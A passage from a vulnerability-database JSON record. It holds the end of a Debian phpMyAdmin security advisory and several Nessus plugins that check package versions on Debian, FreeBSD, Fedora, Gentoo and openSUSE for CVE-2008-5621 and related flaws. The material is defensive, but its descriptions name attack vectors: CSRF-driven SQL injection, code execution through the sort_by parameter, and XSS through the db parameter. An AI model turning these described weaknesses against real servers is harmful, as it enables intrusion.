input sanitising allowing a user\nassisted remote attacker to execute code on the webserver.\n\nFor the stable distribution (etch), this problem has been fixed in version\n2.9.1.1-10.\n\nFor the testing distribution (lenny) and unstable distribution (sid), this\nproblem has been fixed in version 2.11.8.1-5.\n\nWe recommend that you upgrade your phpmyadmin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.dsc\n Size/MD5 checksum: 1021 9428b84187a0fc1c893e099987f746f6\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz\n Size/MD5 checksum: 3500563 f598509b308bf96aee836eb2338f523c\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.diff.gz\n Size/MD5 checksum: 54951 8441cbf454016d4425dddaef569bbd21\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10_all.deb\n Size/MD5 checksum: 3603132 538d80062d8fc4c009e0e0e01ffbacd4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 8, "modified": "2009-02-11T21:44:32", "published": "2009-02-11T21:44:32", "id": "DEBIAN:DSA-1723-1:67D35", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00032.html", "title": "[SECURITY] [DSA 1723-1] New phpmyadmin packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:45:17", "description": "Michael Brooks discovered that phpMyAdmin, a tool to administrate\nMySQL over the web, performs insufficient input sanitising allowing a\nuser assisted remote attacker to execute code on the webserver.", "edition": 26, "published": "2009-02-13T00:00:00", "title": "Debian DSA-1723-1 : phpmyadmin - insufficient input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2009-02-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:phpmyadmin"], "id": "DEBIAN_DSA-1723.NASL", "href": "https://www.tenable.com/plugins/nessus/35664", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1723. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35664);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"DSA\", value:\"1723\");\n\n script_name(english:\"Debian DSA-1723-1 : phpmyadmin - insufficient input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Michael Brooks discovered that phpMyAdmin, a tool to administrate\nMySQL over the web, performs insufficient input sanitising allowing a\nuser assisted remote attacker to execute code on the webserver.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1723\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin package.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.9.1.1-10.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"phpmyadmin\", reference:\"2.9.1.1-10\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:43:32", "description": "The phpMyAdmin Team reports :\n\nA logged-in user can be subject of SQL injection through cross site\nrequest forgery. Several scripts in phpMyAdmin are vulnerable and the\nattack can be made through table parameter.", "edition": 25, "published": "2008-12-12T00:00:00", "title": "FreeBSD : phpmyadmin -- cross-site request forgery vulnerability (54f72962-c7ba-11dd-a721-0030843d3802)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-12T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:phpMyAdmin", "p-cpe:/a:freebsd:freebsd:phpMyAdmin211"], "id": "FREEBSD_PKG_54F72962C7BA11DDA7210030843D3802.NASL", "href": "https://www.tenable.com/plugins/nessus/35089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35089);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_xref(name:\"EDB-ID\", value:\"7382\");\n script_xref(name:\"Secunia\", value:\"33076\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- cross-site request forgery vulnerability (54f72962-c7ba-11dd-a721-0030843d3802)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin Team reports :\n\nA logged-in user can be subject of SQL injection through cross site\nrequest forgery. Several scripts in phpMyAdmin are vulnerable and the\nattack can be made through table parameter.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2008-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2008-10/\"\n );\n # https://vuxml.freebsd.org/freebsd/54f72962-c7ba-11dd-a721-0030843d3802.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb7b6843\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin211\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin211<2.11.9.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<3.1.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:06:21", "description": "Improvements for 3.1.1.0: - [core] Navi panel server links wrong -\n[core] bad session.save_path not detected - [core] Re-login causes PMA\nto forget current table name - [export] do not include view name in\nexport - [display] enable copying of auto increment by default -\n[core] do not bail out creating session on any PHP warning - [display]\nproperly update tooltips in navigation frame - [core] do not use ctype\nif it is not available - [display] HeaderFlipType 'fake' problems -\n[display] Incorrect size for view - [display] Drop-down menu blinking\nin FF - [lang] Catalan update - [lang] Finnish update - [core] Avoid\nerror with BLOBstreaming support requiring SUPER privilege -\n[security] possible CSRF on several pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-12-15T00:00:00", "title": "Fedora 8 : phpMyAdmin-3.1.1-1.fc8 (2008-11221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5621"], "modified": "2008-12-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "id": "FEDORA_2008-11221.NASL", "href": "https://www.tenable.com/plugins/nessus/35096", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-11221.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35096);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"FEDORA\", value:\"2008-11221\");\n\n script_name(english:\"Fedora 8 : phpMyAdmin-3.1.1-1.fc8 (2008-11221)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Improvements for 3.1.1.0: - [core] Navi panel server links wrong -\n[core] bad session.save_path not detected - [core] Re-login causes PMA\nto forget current table name - [export] do not include view name in\nexport - [display] enable copying of auto increment by default -\n[core] do not bail out creating session on any PHP warning - [display]\nproperly update tooltips in navigation frame - [core] do not use ctype\nif it is not available - [display] HeaderFlipType 'fake' problems -\n[display] Incorrect size for view - [display] Drop-down menu blinking\nin FF - [lang] Catalan update - [lang] Finnish update - [core] Avoid\nerror with BLOBstreaming support requiring SUPER privilege -\n[security] possible CSRF on several pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=475954\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-December/017694.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d04cff9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"phpMyAdmin-3.1.1-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:29", "description": "The remote host is affected by the vulnerability described in GLSA-200903-32\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in phpMyAdmin:\n libraries/database_interface.lib.php in phpMyAdmin allows remote\n authenticated users to execute arbitrary code via a request to\n server_databases.php with a sort_by parameter containing PHP sequences,\n which are processed by create_function (CVE-2008-4096).\n Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote\n attackers to inject arbitrary web script or HTML via the db parameter,\n a different vector than CVE-2006-6942 and CVE-2007-5977\n (CVE-2008-4775).\n Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows\n remote authenticated attackers to perform unauthorized actions as the\n administrator via a link or IMG tag to tbl_structure.php with a\n modified table parameter. NOTE: this can be leveraged to conduct SQL\n injection attacks and execute arbitrary code (CVE-2008-5621).\n Multiple cross-site request forgery (CSRF) vulnerabilities in\n phpMyAdmin allow remote attackers to conduct SQL injection attacks via\n unknown vectors related to the table parameter, a different vector than\n CVE-2008-5621 (CVE-2008-5622).\n \nImpact :\n\n A remote attacker may execute arbitrary code with the rights of the\n webserver, inject and execute SQL with the rights of phpMyAdmin or\n conduct XSS attacks against other users.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2009-03-19T00:00:00", "title": "GLSA-200903-32 : phpMyAdmin: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5977", "CVE-2008-5622", "CVE-2006-6942", "CVE-2008-4775", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-03-19T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:phpmyadmin"], "id": "GENTOO_GLSA-200903-32.NASL", "href": "https://www.tenable.com/plugins/nessus/35964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200903-32.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35964);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-6942\", \"CVE-2007-5977\", \"CVE-2008-4096\", \"CVE-2008-4775\", \"CVE-2008-5621\");\n script_bugtraq_id(32720);\n script_xref(name:\"GLSA\", value:\"200903-32\");\n\n script_name(english:\"GLSA-200903-32 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200903-32\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been reported in phpMyAdmin:\n libraries/database_interface.lib.php in phpMyAdmin allows remote\n authenticated users to execute arbitrary code via a request to\n server_databases.php with a sort_by parameter containing PHP sequences,\n which are processed by create_function (CVE-2008-4096).\n Cross-site scripting (XSS) vulnerability in pmd_pdf.php allows remote\n attackers to inject arbitrary web script or HTML via the db parameter,\n a different vector than CVE-2006-6942 and CVE-2007-5977\n (CVE-2008-4775).\n Cross-site request forgery (CSRF) vulnerability in phpMyAdmin allows\n remote authenticated attackers to perform unauthorized actions as the\n administrator via a link or IMG tag to tbl_structure.php with a\n modified table parameter. NOTE: this can be leveraged to conduct SQL\n injection attacks and execute arbitrary code (CVE-2008-5621).\n Multiple cross-site request forgery (CSRF) vulnerabilities in\n phpMyAdmin allow remote attackers to conduct SQL injection attacks via\n unknown vectors related to the table parameter, a different vector than\n CVE-2008-5621 (CVE-2008-5622).\n \nImpact :\n\n A remote attacker may execute arbitrary code with the rights of the\n webserver, inject and execute SQL with the rights of phpMyAdmin or\n conduct XSS attacks against other users.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200903-32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-2.11.9.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 2.11.9.4\"), vulnerable:make_list(\"lt 2.11.9.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:46:55", "description": "This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)", "edition": 24, "published": "2009-01-22T00:00:00", "title": "openSUSE 10 Security Update : phpMyAdmin (phpMyAdmin-5935)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3197", "CVE-2008-1924", "CVE-2008-2960", "CVE-2008-5622", "CVE-2008-4326", "CVE-2008-1567", "CVE-2008-1149", "CVE-2008-4096", "CVE-2008-5621"], "modified": "2009-01-22T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "SUSE_PHPMYADMIN-5935.NASL", "href": "https://www.tenable.com/plugins/nessus/35449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-5935.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35449);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1149\", \"CVE-2008-1567\", \"CVE-2008-1924\", \"CVE-2008-2960\", \"CVE-2008-3197\", \"CVE-2008-4096\", \"CVE-2008-4326\", \"CVE-2008-5621\");\n\n script_name(english:\"openSUSE 10 Security Update : phpMyAdmin (phpMyAdmin-5935)\");\n script_summary(english:\"Check for the phpMyAdmin-5935 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is a version upgrade to phpMyAdmin 2.11.9.4 to fix various\nsecurity bugs. (CVE-2008-2960, CVE-2008-3197, CVE-2008-1149,\nCVE-2008-1567, CVE-2008-1924, CVE-2008-4096, CVE-2008-4326,\nCVE-2008-5621, CVE-2008-5622)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(20, 79, 89, 200, 352);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"phpMyAdmin-2.11.9.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": 